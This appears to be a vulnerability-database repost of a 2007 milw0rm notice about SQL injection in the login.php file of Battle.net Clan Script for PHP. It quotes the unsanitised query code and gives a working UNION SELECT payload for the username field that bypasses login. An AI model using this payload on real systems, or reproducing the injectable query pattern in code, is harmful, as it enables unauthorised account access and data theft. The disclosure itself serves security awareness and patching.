Lucene search

K
securityvulns
SecurityvulnsSECURITYVULNS:DOC:16674
HistoryApr 11, 2007 - 12:00 a.m.

Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

2007-04-1100:00:00
vulners.com
121

script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql

auteur : h a c k e r _ X


code :

line 9 –> $user = $_POST['user'];
line 10–> $pass = $_POST['pass'];



line 21–> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);



exploit :


Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything


thinks to : max007,simo64,brutalism and all marocains hackers

special thinks for "P Y N S S O"


milw0rm.com [2007-04-09]

Use Vulners API to create your own security tool

API usage cases
  • Network scanning
  • Linux Patch management
  • Threat protection
  • No network audit solution

Ways of integration

Integrate Vulners API